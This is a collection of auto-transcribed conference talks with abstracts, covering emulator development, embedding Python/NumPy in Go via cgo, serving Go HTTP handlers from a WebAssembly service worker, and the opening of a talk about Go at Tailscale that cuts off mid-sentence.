individuals. Furthermore, these systems live on through the efforts of people developing software for them long after they had been discontinued. The description you see here is from a homebrew game called Micro City. It was developed from scratch for the Game Boy and it's possible to play it on an emulator, of course, but also you can download it onto a flash card and play it on an actual Game Boy. The source code for it can be found on GitHub. And of course, what enables the development of these homebrew games in the first place is to a great extent the existence of emulators. To wrap it up, writing an emulator is a fun, educational, but at the same time inspiring and humbling journey which when experienced appropriately can push you to become a better engineer. All right, so as we reach the end of the talk, I'd like to also point out that emulator development is more accessible today compared to say 20 years ago. Firstly, computers are faster today when compared to the early 2000s and thus you can potentially write a decently performing emulator in a language that is not C, C++ or RAST. If you do decide to go that way though, say because you are more confident in developing another language, then depending on the system you will want to emulate, you should set the right expectation when it comes to the outcome. And once again, I'm talking about performance here. That being said, it doesn't invalidate how fun and how rewarding the whole journey can be. And secondly and more importantly, the world today is more connected than ever. You can very easily reach out to people or find information you might need. There are numerous communities that you can join and actively participate in, like an emulator development subreddit or a discord server. And people in such enthusiastic communities are generally more than happy to help and to point you to the right direction when necessary. And beyond this, there is really no shortage of resources available for you to get started. So that's all. Have fun. Thank you very much for sticking through. I hope you enjoyed attending the talk. As much as I enjoyed putting it together. And I'd really appreciate if you took a few seconds to complete the short feedback form of this talk. Beyond this, I'll see you next year in Brussels. Hopefully once again in an emulator development everyone. I'm muted again. Okay, great. I like this comment. Let's see, does it work? Does it work? I think we're live and I'm on the screen for some reason. Can you say something? Test, one two? I think we're live. Yeah, we're live. But I think the same issue that Niels had a minute ago that he's on the screen. Yeah, okay. All right. So thank you very much for your talk. It was pretty cool. I love the one on the right. Somebody commented, this talk makes developing an emulator look like a game itself. And I think that's... Yeah, that's one way to look at it actually. It's if you're doing something, it's supposed to be fun. That's what I think. So if it's not fun, I think Steve mentioned earlier that choose a game or a system that you like and you have and relate to otherwise, when you get stuck, you might not want to solve the issues that you might find. So the whole idea is to do something in a context that you enjoy. And I really think that this is something that you... This is a project, potential hobby project that you can do and teach you a lot of stuff. Yeah, okay. Yeah, sorry, I'm a bit distracted. I'm looking at the live feed and I'm looking at whatever, right? Because it's still... It's stuck on me, right? For some reason, things I'm important. So yeah. Okay. Yeah, this is... You guys are doing a lot of the work for us to be able to present this talk. So yeah. This is nothing compared to actually preparing a talk and giving a talk, right? And then getting hate mail from people for giving the talk. I hope I don't get that. I'm also having a look here to see if there are any questions. Yeah, we have a couple of questions. But I wanted to start with the question because you were talking about in the old days how it was and it was difficult to get into. But nowadays, it's much easier, of course. And I was wondering if you could give some pointers for resources for people to learn and whatever, right? Something like that. Yeah, I mean, I do have a list of the copy and paste into the room later. The idea that I just pointed out is for people to actually go and search for this stuff. For example, if you go and check in the emulator development subreddit, for sure you will find there are people showing off their new emulator asking for questions. So it's really easy to get started with that. And I think that's the biggest part of this thing, to know that the information is out there, to go get it and get started on your own. But for sure, if anybody wants specific, more concrete info, I do have some links that I can point you to. But generally, the one that I recommend, I think also Steve mentioned again, is go for a chip 8 at first. And that buy went for. And it's a very nice soft landing into this. Yeah, I mean, you mentioned before that in the early 2000s, it might have been a bit more, you know, harder to get into stuff. It might have been, at least in my mind, since emulator developers were kind of a closed loop in the sense that they were the Gandalfs, you know, and we are the common mortals. And it was really, you know, really, hard to say, intimidating. But now, the fact that you have the information out there, you can just get started on your own. Also, you know, just ask people for help. Does it answer your question? Yeah, sorry, sorry, sorry, sorry. I'm still trying to fix the video thing. It does answer my question. I'm trying to fix the video thing. It's not being fixed. So we'll just continue with the questions till somebody tells me how to fix it. But what you just said, because there are a couple of questions that kind of relate to this. Somebody says that chip 8 was your first, what was your second emulator? And what is the most important thing you learned from it? There was no second emulator. I mean, it's something I'm definitely looking into. And actually, what I said about the story is that the way it started is that I was excited about the dev room. And I was trying to think why was I excited about the dev room. And then I thought that I had done that chip 8 interpreted in the past. And actually, you know, what we're discussing behind the scenes actually, this dev room got me excited to look into this again, once again. Now, the most important thing I learned, what I mentioned this slide about appreciating what we have and what we take for granted. And if you program in high level language, you have a lot of a lot of the stuff taken care of for you. You know, you don't have to care about the underlying implementation sometime most of the times. But maybe, so for example, people in the 70s, also in the 80s or in the 90s, they had to, you know, do a lot of kind of very hardcore stuff by today's by today's standards. So I'm really, you know, I really appreciate that. I really appreciate that there is a formation out there that people decided to share it with the world. That's also really cool. And I mean, another thing I did mention that you learn about stuff like the insight of a processor. Most of us maybe learned that in the context of a university course. For me personally, I came from a broader engineering background. So I didn't get to do this kind of stuff as in depth. So this kind of project is what really, you know, what made to actually learn more, more about these things. And especially because of my interest in any letter from a long time ago. This was very, you know, a very nice, nice way to, to learn about these things. And I, as I said, it's really learning about these things. It's something that can't push you to think twice. My, my microphone is noisy. No, it's not noisy. Yeah, I was saying that it can make you think twice if you want to, if you, you know, if you're pushing code that might not be up to, up to spec bar to, you know, your standards that other people might be, you know, developing on top of that code, you want to do, you know, it is far as yet to push, push even a bit further to become even better. That's what I, that's what, what was the case in my, you know, in my case. All right. All right. There was another, another question also kind of relates. It's, so why would you suggest for somebody to get into emulation and starting with the, and if somebody starts with that, I think the follow up is should he start with another chip?
|
Even to this day, there's something utterly captivating about bringing to life a piece of software effectively frozen in time, designed to run on what was originally a black box, by means of a device that one uses to check up on cat facts. Adding to this, it can even be enhanced and possibly perform better than its developers ever hoped for. If you also got to play around with your first computer in the early 2000s, chances are that console emulators were amongst the first pieces of software you've ever run on a computer. Submitting this talk was an endeavour to explore this unexplainable (or is it?) fascination by what seems to conceptually be a compatibility layer. More importantly, the talk aims to have you intrigued about emulation development and the scene in general in the year 2021, by presenting the significance of the emulation community in the context of education and history preservation. It will also highlight how emulation development is more accessible today compared to the early days of the likes of PSEmu Pro, Project64 and NO$GMB - thanks, in no small part, to the FOSS community. TLDR: this will focus on the "why" (rather than on the "how") you should have a go at writing your first emulator. Additional info: The intention is to provide people that can relate to the below points... solid programming background and grasp of computer science fundamentals naturally curious about the inner workings of computers a general interest in console history a little too sceptical as to what business they could have entering territory of the emudev Gandalfs of the 2000s that they looked up to during their school years [optional, but desired] having fond memories of their (even-then) ancient Pentium 3 struggling to handle Tekken 3 on bleem! (you get the picture) ... with good reasons as to why dipping their toes in emulation development is worth their time, and how writing an emulator is an awesome all-around learning experience, out of which you'll become a better engineer. Plus, amongst other, to highlight how such a journey is meaningful, rewarding and worthwhile -- as it lies within context you can relate to: seeing your childhood games come to life (or, on the remaining 99% of occasions: using the debugger that you wrote trying to figure out why you can't get past the first screen)
|
10.5446/53654 (DOI)
|
Hi, and welcome to my talk. We're going to talk about how to embed Python in Go with almost no civilization and very little memory. My name is Niky Tebeka. I work and own 353 solutions, where we do some consulting and a lot of training in both Python Go and the scientific Python stack. I've been working with Python for about 24 years and go from the very beginning, 11 years. And I'm also one of the organizers of Go for Con Israel and the Go Israel Meetup, and I used to organize the Python Israel Meetup. So the question is, why? Why do we want to use both Go and Python in the same project? We have Go. It's great language. There's a lot of libraries. So why should we use another language in it? And as Scotty says, use the right tool for the right job. Go is great at high concurrency, at servers, API endpoint. But when it comes to data science, Go is years away from Python. Yes, we have Go now and friends, but it's not the same. The Python ecosystem is much, much richer. And chances are your data science team is working in Python. Converting code from Python back to Go will take time, and it's also a risky operation. So why not enjoy both worlds? We write and do the heavy lifting in Go and use Python for the data science stuff. The question is then, why not RPC? Start a Python server on HTTP or GRPC and then call it from Go. And this is an awesome solution. If you can do that, by all means, go that path. It's much easier. It's much more structured, and you will have way less errors when you do that. But sometimes you have very strict performance requirements. And in these cases, we need to think about something else. Every time you do an RPC call, these RPC calls mean that you need to do civilization, a network call, and then this civilization on the other side, do some work, and then to send back the data, the result, you need to do again civilization, another network call, and another de-civilization. And this takes time. So if you can eliminate that, this can save us a lot of time, and the time spent will be only on the actual work and not the communication. So how are we going to do it? We're going to glue C, we're going to use C as a glue between Python and Go. And we have on the Go side, we have C Go, which we all know. And Python, the Python that we are using is called C Python, because it's Python implemented in C. There are other pythons as well. Right? There's Jython, which is Python written in Java. There is PyPy, which is Python written in Python, and a lot of times it's faster than C Python, and several other ones. The C Python has an extensive C API. Most of the time, people use the C API to write extension to Python. You identify that some code is too slow in Python. You rewrite this code in C using the Python C API, and then you can import it and use it as a regular Python model. But the C API can let you also work on the other direction. You can import Python or embed Python inside an application. And I've done it several times, and it's a great way of adding scripting and dynamic features to your program. And this is what we're going to do. To avoid serialization, we are going to look at some preconditions that help us. We have code that is you're going to use NumPy to do outlier detection. And what is going to help us is that both the GoFloat64 and NumPy's Float64 have the same representation memory. They use the same representation of the floating point number. The second thing is that both NumPy arrays and Go slices are continuous in memory. We don't have gaps. So we can pass them around in the underlying representation memory the same way. So let's have a look. First, let's look at the setup. So here's an example code. What we're going to do. We'll start by creating a new outlier object which uses the code from the outlier Python module and the function detect inside it. And we're going to defer the closing of this object and we'll talk about why. Then we're going to get some data, pass it along to the detect method, and get back the indices of the outliers if there are any. And finally, we're going to print them out. If you're going to look at the Python code, it's very short. We calculate the cscore for every element in the array that's coming in. Find out where the elements are more than three, have a cscore of three and bigger, bigger than three, and then we're going to return these indices. So this is the example code, this is the Python code, and the go code that we want to run. In outliers, we start with the new function. So the new function first calls initialize to initialize Python and then it is going to load Python which is loading a Python function and saving it as a go variable. And then we're going to return these outliers. And you can see here that fn is the field that is a Python object. Everything in cpython, including functions, is something called pointer to a py object. So what does initialize do? Initialize is going to use sync.once to make sure that we initialize only once. It is going to call the c function for initializing Python and get there if we have it. And in grudosy, initpython is calling py initialize which initializes Python and then import array which is initializing numpy. The second thing we saw in outliers.go is that we loaded the Python function. When we load the Python function, we need to convert the go strings to c strings. And right away, make sure that we free these c strings. And then we call the c function from our glue code to load this function. And return the function at the end. So here's the load function. It gets a model name and a function name. We convert the name from c string to Python string and the same we do for the function name. Sorry. And we call the py import to import the model. If we cannot import the model, we return null. We turn null in Python indicates an error. That there was some kind of an exception. And then we do get other string to get the function from the model. So we do a decref. Decref means it decrements the reference counter. Python memory management is a reference in counting. Every time you get an object, it has a reference counter that is increased by one and when you're done with it, you should decrease the reference counter. And this, using two systems that each one has its own way of managing memory, this is the most difficult part when you're dealing with these kind of things. And then we return the function. Right. And now we're all set. So we initialize Python, initialize numpy, we loaded the module and we got the pointer to the function. Now we're going to have a look at what happens when we call the tag function all the way from go up to the Python code, down to the Python code. So what are we going to do is we're going to make sure that everything is using the same memory. So we're going to take the slice, the go slice, and we're going to pass it to see just as the address of the underlying array. And then from in the C code, we're going to create an umpy array that points looks at the same memory location where the underlying array of the slice is looking to. Okay, so here is our detect function. We convert the float 64 slice to a C double array by taking the address of the first element of the slice and casting it to a C double. And then we call the detect function from the glue C code with our function pointer, the pointer to the Python function that we have from the new the array and how many elements are in the array. In the glue code, what we need to do is take this double array of values and convert it to an umpy array. We tell the umpy what are the dimensions of the array, and we call the py array simple new from data, which tells it create an umpy array looking at these values in memory, it is not going to copy them. Then we need to construct the function argument in Python in the C API, function arguments are passed as a tuple, which is like a slice but immutable, you cannot change it. And here we create a new one and set the first item to our to the array. And then we do Python object, call object to the function that we have, this is passed on line 33, and these arguments to just constructed. Right, and this is going to be basically calling the function detect with data, which is an umpy array. And now, how do we get the data back to go? So what we're going to do here is we're going to do the same thing, we're going to get the underlying memory from the umpy array, we're going to pass it back to go. And now there is a design decision, do we want to keep using the data from the umpy array? But then we need to make sure that once we're done with the umpy array, somehow we're going to free this memory by calling decrypt or, and this is the approach I took, is saying most of the time the number of outliers is small, it's not going to be as big as the array. And this method of keeping the umpy memory is pretty complicated and will make the code complicated. So I'm going to copy over the code from Python to a new slice managed by the go memory, and then free the Python. And this makes it much easier because now I can just return a slice and move on with go as it is without needing to think about freeing and finalizers and many other things that might or might not work as expected. So let's have a look. So in the Gluton C we have a result object, right? So this result object is the umpy array, the indices, which is basically an array of longs, how many indices we found and an indicator, an integer, whether there was an error or not. So we set the object to the umpy array and we convert it to a umpy object, to a sorry to a Python object, right? It was a pyarray object, if you can see it on line 48, and now we convert it to Python object. And this is okay because pyarray object starts with the Python object and then have some extra fields on it. We set the size and this is calling again an umpy function, umpy capi function called pyarray size and then the index says we get the underlying memory again using pyarray.getPTR, getting the pointer to the memory and returning the results. Okay, so now in detect we got the data. We got the result and checking if there is a result, we're going to return an error. Otherwise, we're going to convert the c long pointer to a slice and we're going to do it by a trick of pulling the go compiler. So we set a max size for the return value which is one gigabyte and if the size that we get is more than one gigabyte, we contain an error. And then we get an unsafe pointer to the carray and then we cast it to look like it's an array of maximal size at that location in memory. This is not going to allocate a one gigabyte memory in go, just pulling the compiler to think that there is a one gigabyte array starting at that location. And now we create our own slice. This is the one that is going to be managed by go and we're going to copy to the slice up to the size from the array that c returned or that python returned. Okay, so now we have a slice which is managed by go and we return this slice of course. So now we have a slice that is managed by go. So now we can tell python, we're done with what you did, we're done with the memory that you allocated. So we decrement reference counter for the non-pr array that was the result of calling the detect function in the python model and return the indices. And now we have the data. For some bookkeeping, we also have a close and we saw it before on the outliers object and this one is calling py decref on the function itself. So this function object also consume memory and we can free it. So we have our code going all the way down and all the way up. We didn't do any civilization, we use the same underlying memory from here and from there and this is because both numpy and go using the same representation in memory for a float or an integer. And we did very little memory and this is the epsilon memory when we decided that to make the code simpler and easier to use with memory management, we are going to copy the indices from the memory managed by python to the one managed by go. What's left is building. We need to build this code and to build this code, we need to help the cgo to find out things. So first we're going to need to tell it where to find the python headers. If you look at glue. age, we see that we include python. age. So it needs to know where it is. And what we're going to use is a cgo directive. The cgo directive for pkgconfig is calling the pkgconfig utility which is found on most Linux systems and can tell you about where to find header files for various packages. It should tell you also about how to link with various packages but for some reason it didn't do that. So I had to tell cgo also to link with the python library. So this is for the python one and this was pretty easy to get. The problem was the numpy one. So in glue.c we have include of the numpy object and we need to find where the numpy objects and headers are. And I couldn't find a way to do it with pkgconfig or in a static way. The way to do it is to call python or call and ask numpy for a specific function that will tell you where numpy is installed and where to find the header files. So this has to be dynamic and this is not something that is easy to do with the go build system. So what I decided to do is do it outside of the build system. I'm using a make file and I'm calling python and telling it to input numpy and print the numpy get include which tells us where are the include libraries. And then when I'm running the code or building the code I'm using the cgo cflags dash i numpy include. And this is how I'm passing dynamically the location of the numpy header files to the build system or the run system. Another thing I need to do is because I'm doing an import in python, python looking for model where to import models in something called the python path. And I'm adding the current directory where the outliers.py is to the python path so a test will work. And finally we can run the tests and we can see that they're passing. Okay so what's left? What's left is one the thread safety of the go routine safety. Python has a global interpreter lock and when you call it from in the c level you need to make sure that you're on the same thread calling python. We can probably add a sync.mutex to our outliers and finish with this issue but maybe there are other things that we need to be aware of. Maybe we need to lock to the OS thread. This is also an option. I would like to have better error recovery. What I'm doing right now is I'm getting the last error from python and returning it as an error. But python can also give you a stuck trace and many other things so maybe I can utilize that to show better errors and maybe do better error recovery in the future. Memory leaks. Every time you have two different systems, each one managing their own memory, this is an option. I think I got all of them but I'm really not sure. So hopefully I'm getting them right. So thank you for listening so far. There is a blog post and this talk is based on this blog post on the other live blog and then later on Chris took it and made an excellent extended blog post on the subject of embedding python. I'd like to thank the folks on the dark arts channel on the go for slack. They helped me a lot in the design and understanding some of the edge cases. And you can find all the code and these slides on GitHub repo for my talks. That's it. Thank you and now it's time for questions.
|
In this talk we'll see how we can call Python function from Go "in memory" and with close to none serialization. Like tools, programming languages tend to solve problems they are designed to. You can use a knife to tighten a screw, but it’s better to use a screwdriver. Plus there is less chance of you getting hurt in the process. The Go programming language shines when writing high throughput services, and Python shines when used for data science. In this talk we'll explore a way to call Python/numpy code from Go in memory using some cgo glue. This approach is fast and risky, use at your own risk.
|
10.5446/53655 (DOI)
|
Hi everybody, my name is Nicolas LePage. I'm a developer at Zenica IT in France. I work mostly with JavaScript and I also like experimenting with Go. This is my first talk in English, so don't be surprised, I'm a little out of practice. Today I'm going to talk about deploying a Go HTTP server in your browser. First you may be wondering why? Why would I want to do that? Well, it could be useful for demonstration purposes. I have this little Go project. It is a command line interface tool which helps me add a text at the bottom or at the top of a JPEG image. And it also has an HTTP subcommand with a form where I can do the same. Select an image and choose some text to add at the top and the bottom. Then the server sends back the image with the text. Now I would like to put up a little demonstration page for my project, but I don't want to actually deploy a Go server for this. So that's how I started wondering if we could deploy a Go HTTP server in a browser. Since Go 1.11, running a program written in Go in a browser is possible if you build it to WebAssembly. You get a WebAssembly binary which can be downloaded and executed by a browser. If you haven't heard about WebAssembly, it uses a portable bytecode format executable by browsers and compiled from higher level languages such as Rust, C, C++, or Go. Of course, Go code executed in a browser has exactly the same limitations as any JavaScript code executed in the same browser. For example, it will not be able to use the OS package to access the client's file system. So it will also not be able to actually start an HTTP server in the browser. However, when an HTTP request is sent from a web page, there are some cases when it will not actually reach the server. One case is when it is intercepted by a service worker, which usually allows web applications to work offline, for example. Now I think you are starting to see where I'm going with this. The question is, will it be possible to execute a Go WebAssembly binary in a service worker and use it to handle HTTP requests? Let's find out. A little warning before we go any further. When you are targeting WebAssembly, you have to make sure all the code you are trying to build is compatible. This means, for example, that you cannot rely on C bindings, system dependencies, or a database server. Also, you have to be careful with Go's standard library, which for a large part can be built to WebAssembly, but will actually panic at runtime. That being said, today I'm going to focus on the HTTP side of things. First, let's have a quick look at how it is possible to respond to an HTTP request from a service worker. When a service worker intercepts an HTTP request, it receives a fetch event. The fetch event contains a request object which holds all the information we need about the request, method, headers, and also the body contents, if any. The fetch event also has a respond with method which accepts one parameter of type response or promise for response. So by reading the request object and building a response object to give to respond with, we are able to respond to an HTTP request from a service worker. However, what we want to do is delegate this task to a Go WebAssembly binary. Now, let's take a step back and review how we usually build an HTTP server in Go. The most straightforward way is to use the HTTP package. First, we define HTTP handlers using handler, which accepts a handler, or handlefunk, which accepts a simple function. Indeed, handlers are simple functions, which receive a response writer and a request. So we can already see that this looks a lot like the service worker's fetch event. We may also choose to define handlers using some third-party libraries, such as Gorillamax. Then, once our handlers are defined, in most cases, we will call listen and serve, which we start listening for HTTP requests and use our handlers to respond to these. In our case, we would like to reuse as much as possible of this code we wrote, but use it to respond to a request intercepted by a service worker. Indeed, the handlers are WebAssembly compatible, we can keep and reuse them as they are. So, this is nice, because the handlers are the main part of our code. This is where we declare all the logic. Of course, the one thing we are not going to be able to reuse is the call to listen and serve. But this is okay, because we are going to take a pretty radical shortcut. Usually, when we call listen and serve, it takes care of a lot of things for us under the hood. And for each request, it calls the handler if we gave one in parameter, or default serve mix, which is the default handler. So, what we can actually do is directly call the serve HTTP method of the handler, or of default serve mix. So, let's review the plan. Step one, we intercept the HTTP request in the service worker, and send the JavaScript request object to the WebAssembly binary. Step two, in the WebAssembly binary, we map the JavaScript request into a go request and call the handler. Step three, once the handler has returned, we map the go response into a JavaScript response object, and send it back to the service worker. Step four, in the service worker, we respond to the HTTP request with the JavaScript response object. Now, ideally, we still want to be able to build standard binaries of the server working for Linux or macOS, for example, and also the WebAssembly binary. For this, we can move the listen and serve call into its own file and use build text to tell the group compiler that this file is not compatible with WebAssembly. Then, we can create a specific file for WebAssembly, this time using the file naming convention instead of the build text to tell the compiler that this file is compatible only with WebAssembly. And in this file, we are going to use our own API, which will probably look something like this. So, a wasmhttp.serve function, which needs only the handler parameter. Now, let's dive in the implementation of this serve function. If you remember the step one of the plan, it needs to receive the JavaScript request objects. So, from the JavaScript point of view, the service worker needs to call the WebAssembly binary with each request object. At the moment, go WebAssembly binaries have no way to export functions to our other values to JavaScript. So, in order to work around this, the serve function will have to give the callback function to the service worker. The syschool.js package allows to create such callback functions using func off. Func off takes a go function and creates a JavaScript function from it. The js.value type represents a JavaScript value for go. The first underscore parameter is the this value of the JavaScript function, which isn't useful for us. The callback function needs only the first argument, which is the JavaScript request object. And it will return one value, which will have to be a JavaScript promise for a JavaScript response object. Then, the serve function can register the callback with the service worker by calling a set off function, which has to be previously declared in the service worker's global scope. From the service worker's point of view, we are now able to forward the fetch event's request to the WebAssembly binary. In the event handler, we just have to call the go callback function with the fetch event's request. The self variable is a reference to the service worker's global scope. So this is handy for making the set go callback function available for the WebAssembly binary. The actual code is a little more complex because we have to use a promise for the callback. Otherwise, a fetch event might occur before the callback is defined. Step one of the plan is done. Now step two on the go side, let's focus on implementing this callback function. We said that this callback function must return a promise for a JavaScript response object. So let's create a new promise and return it. The new promise function I'm using here is not part of the syscall.js package. It is a utility function to ease the creation of a new JavaScript promise, which can be a little cumbersome using syscall.js. Returning a promise means the callback function is asynchronous. So we need to start a new go routine. Otherwise, the service worker would be blocked. And starting a new go routine actually makes sense because this is how a go HTTP server usually works. It starts a new go routine for each request. And this is it for the callback function. The rest of the work will be done in the new go routine. Now the first thing we need to do in this new go routine is create an instance of a go HTTP request from the JavaScript request object. We could use the new request function from the HTTP package. But if you read carefully this documentation, it says that this function is suitable only for outgoing requests. But what we actually want is to emulate an incoming request. Thankfully, the HTTP test package has the same new request function for creating requests suitable for passing to an HTTP handler. Usually, this is useful for testing purposes. But this is exactly what we want. So let's use this. A new request function takes three parameters. The first two are the request method and URL, which we can simply read from the JavaScript request object properties. The third parameter is going to be a little bit richer. It is an IOR reader for the request body. How are we going to copy the binary data of the request body from JavaScript to go? Really for us, the CiscoJS package has the copybytesToGo function just for that. It takes a byte's slice as destination and a reference to a JavaScript-typed array of unsigned 8-bit integers as source. So this is OK. With just a few more plumbing, you should be able to copy the body content for JavaScript to go. We call the arrayBuffer method of the JavaScript request, which returns a promise on an arrayBuffer. We wait for this promise to be resolved. Then we can wrap the arrayBuffer into an unid8 array. Now we can just create a byte's slice of the same length and finally call copybytesToGo. A byte's buffer will do just fine for the body parameter of new request. Now we have a Go request. The only important information missing on this request is the headers. Headers are stored in a simple map of strings, both in JavaScript and Go, so we just iterate over these and set each header on the Go request. And the Go request is now complete. We are almost done with step 2 of the plan. Actually we are already starting step 3. In order to call the handler, we need a value to act as a response writer. For this, we can use the responseRecorder type from the HTTP test package, which implements responseWriter and records the response. And now we are able to call the handler's serveHttp method. Since the handler returns, the result method of the responseRecorder allows us to get the HTTP response written by the handler. Now step 2 is really done. Step 3, we need to build a JavaScript response object from the Go response, in fact the opposite of what we did with the request. In order to build a JavaScript response object, we can use the response constructor which takes two parameters, the responseBody and an init object for additional information such as status code and headers. The first parameters accepts several types. One of them is bufferSource. Actually this is not a real type, but either an array buffer or a typed array. Typed array is fine for us. It will allow us to use the CopyBytesToJS function from the syscall.js package, which works just like CopyBytesToGo, but in the opposite direction. First, we have to read all the responseBody content into a byte slice. Then create a new UIN8 array of the same length as the slice and finally call CopyBytesToJS. In order to build the init object, we can use a map of string to empty interface, which the syscall.js package is able to transform to a new JavaScript object. We only add two values, one for the response status code and one for the headers, for which we can also use a map of string to empty interface. And finally, we can call the response constructor. Back to the GoItin responsible for handling the request, we can finally resolve the promise with the JavaScript response we just built. And we are done with step 3. Now in the ServiceWorker, we know that the go callback function returns a promise for a response. For the step 4, we have to send back the response to the page. For that, we can directly give the return value of the go callback function to the fetch events correspond with method. And we are done. Now question is, does this actually work? Let's find out with a simple example. The index.html page sends a post request to slash api slash hello with a JSON body containing a name property. This request should be handled by the API WebAssembly binary, which must return a JSON response with a message property. And this message will be displayed in an alert. On the go side, we only have one handlefang which decodes the request body, then formats a hello message in the response body. And of course, the call to wasmhttp.sr. We must also add something to block the main routine. Here I used an empty select, which is not pretty, but works. Let's try this out. I'm using a private window to avoid having cache or already registered service workers. Okay. We can already see the requests for the page and for the several JavaScript files of the service worker and a last request for the WebAssembly binary. If we call the API, the alert message is okay. And we can have a look at the request. And we can see that it was handled from the service worker. Okay. Now, let's come back to my little project, which was the caption server. The hello example only uses a server to exchange JSON messages. This time, the WebAssembly binary will actually serve the HTML page containing the form. What we can do is create a small HTML file, which will only be responsible for registering the service worker. Once the service worker is activated, it will trigger a reload of the same address, which will now be served from the WebAssembly binary. Let's see if this works. Okay. Let's have a look at the requests. We have our first request for the page and several requests for the service worker files, the WebAssembly binary, and finally, a new request for the page, but this time, served from the service worker. Now, let's try to generate an image. Okay. This one. Any generics. Let's go. So, this is a little slower than the actual server, but it works fine. And if we have a look at the request, we can see that it was served from the service worker as well. Okay. So far, in the examples I have been using, the server is stateless. This means it can be stopped and restarted as much as we want. And this is actually a good thing because the lifecycle of service workers is event-based. The browser will start the service worker only when it is necessary, for example, when a fetch event is received. Then, if no more events are received, after some time, the browser may decide to stop the service worker and kill the WebAssembly binary. So, if my server is stateful, the state will be lost. So, how can we work around this? Well, there is no real solution here. The service worker specification doesn't allow to keep a service worker alive if it has no clients. This means we need at least one page to be loaded in the scope of the service worker if you want to be able to keep it alive. The most we can do is send periodic messages from the page to the service worker in order to keep the browser from stopping the service worker as long as the page is loaded. In summary, it is not really possible to have a stateful server living in a service worker. More information is available on the GitHub project page, including a usage section to help you do the same with your own project. If you give it a try, please let me know, I will be glad to have your feedback. In conclusion, as you would expect, it is not really possible to deploy a Go HTTP server in a browser. However, it is possible to execute Go HTTP handlers in a service worker. Using build conditions allows to reuse most of the code we usually write for building a Go HTTP server, but targeting WebAssembly requires this code to be compatible. And finally, we saw that deploying a long-running stateful server in a service worker is not a good idea because of the lifecycle of service workers. Thank you for listening. Thank you to Fusdame organizers and to the Godavone organizers, and a big thank you to all those who helped me prepare this talk.
|
Have you ever thought to yourself "It would be nice to run this Go HTTP server directly in a browser for demonstration" ? No? Well I have! But it's not possible, right? A Go WebAssembly binary can run in browsers, but cannot serve HTTP... Or could it? Could we run a Go WebAssembly binary into a browser's ServiceWorker, and serve HTTP from it? Well let's find out!
|
10.5446/53656 (DOI)
|
Hello, I'm Brad Fitzpatrick and this is a talk about Go at Talescale. First off I want to say hello again. Long time no see, I haven't been to a conference since Falsedem 2015 and that was actually the trip that I met my wife and so we have been busy raising two boys and they're kind of like the number one reason that I don't get to go to many conferences lately. I guess number two being the pandemic. So anyway, doing it from home and whatever. So for anyone who hasn't met me, hello for the first time. It's a pity that we can't get a beer after that. This is me I guess in 2015 or maybe 2014 at Falsedem. I still kind of look like that except for now I'm giving myself my own pandemic hair cuts and it's just easier to cut it all off. So a bit of background about me. I did LiveJournal back in the day which was kind of one of the first social networking, blogging, forum, commenting sites and it had a bunch of infrastructure and LiveJournal was open source and Memcached was written for LiveJournal was open source and things like OpenID and had a load balancer, couple load balancers that we wrote for it and distributed file system. So it got me into the whole open source world and one of my friends that I was doing the start up with was Evan and I'm going to call him my wise friend Evan. He was always saying wise things like telling me that I should try Debian and telling me that he re-implemented Git and OCaml and Haskell and he had opinions about the storage format and opinions between all the various languages and telling me back in 2006 or 2007-ish that Rust looked interesting and one day he up and quits Linux and he kind of says I'm only using Windows now and he wouldn't tell me why and he couldn't say anything. So I was really curious but I suspected that had something to do with him being a Google and of course he couldn't really say anything. So I joined Google. I wanted to see what all my friends there were doing that were so secretive. It turns out he was working on Chrome and he had to work on Chrome for Windows until he could do Chrome for Linux which is what he really wanted to do. So I joined and he was like, sends me an email and he says hey welcome to Google. It's kind of like, you know, start up is kind of like driving a jet ski but now that you're Google it's kind of like more like driving a giant cargo ship. You know, you've got to like spin the wheel for 15 minutes and nothing happens but you know, once the ship does start moving in the right direction, oh that momentum, those resources. So I got sucked into the Google machine and I worked on some social stuff for a while. I worked on Gmail's backend, the context backend. I worked on Android for a bit. But then I really fell in love with Go and I kind of just got sucked into Go and I did that for 10 years working on the center library and the HTTP in particular and our build system or build and test system. Worked on like releases and kind of all over the place. I guess some dev rally things occasionally. But after 10 years it was kind of time for a change. 12 and a half years at Google was enough. 10 years is kind of my limit doing one thing. So I joined Tailscale. Tailscale is a startup. It is, I was joining right as I turned 40 so people on Hacker News were speculating that I joined because this was my midlife crisis and this was my sports car. So yeah, I guess this is my sports car jet ski and doing a startup again. But I like startups. It's fun. So what is Tailscale? Tailscale I guess you can say is a new style VPN. It's not like the VPN that we don't run any exit nodes. So it's not like the type of consumer VPN where you're trying to hide your IP address so you can download something from another company from another country. It's so companies or individuals can have a network of devices that can all talk to each other. So it gives you the illusion that you have one flat network where all of the devices can talk to each other and see each other subject to central ACO policies that you can set. But it's wire guard based and we do all the NAT and firewall traversal automatically so you don't have to configure your network and you don't have to open up firewall ports or anything like that. It just magically always works. Logically, it gives you a network card that has a static IP address that's just for you and for your device and any traffic you want to do over that IP address just works. And so the open source parts are like everything that you run on your machine is open source except for the GUIs on proprietary operating system. So the Android app is fully open source but the iOS app is not. So anyway, that's kind of our policy now that if it's open source, if your operating system is open source, it's also free for individuals. We want to ideally only make money from companies and so far we're doing fine making money from companies. So we don't have to charge individuals who just want to use it with friends and family or to learn, you know, have fun with networking or whatever. So as I said, we run on basically any OS is our goal. We run our primary operating systems are Linux, Windows, Mac, iOS and Android. We also run on things like FreeBSD which is underneath things like PFSense or OPNsense and we run on Synology which is Linux but Linux on a number of architectures and kind of an unusual user space for Linux. Likewise, Edge routers are a number of architectures but also a unique user space. So that kind of seems like a disaster, right? Supporting all these things because we're a small team of people on JetSkis and we don't have like time to have a team of people working on a client for every operating system. So you might say, if only there was some magical way to write cross-platform native applications and it seems like nowadays the industry answer is, well, just use Electron, right? Just take this web browser with all the security restrictions removed and you can write everything in JavaScript. I mean, I guess like maybe that would work. It seems painful but I'm not like a JavaScript person so that is not the route we run. It doesn't seem fun for me but maybe it would work. No, we use Go because we're a bunch of Go people and we use Go for everything. So this talk is first about how you can use Go for everything and you shouldn't be too scared about that. So in Linux, of course, Go runs and that's not really surprising at all. It kind of works in the way you would expect. There's a daemon that runs and that thing runs as root or root-ish with a bunch of capabilities and you can run it under system D or whatever your init process manager of choice is and then there's a CLI that talks to the daemon to do things like reconfigure the network and whatever. You can just go install that stuff. That's all open source. It uses DevNet time to get packets in and out of the kernel and on Linux it uses NetLink to subscribe to network change events, things like if you change the Wi-Fi or you're plugged into Ethernet, in or out or things like that. And then on FreeBSD there's DevD to get equivalent change notifications. TUN is an interface that's available on most operating systems that you let you inject IP packets in and out of the kernel. So you can do in-userspace, you can implement a network 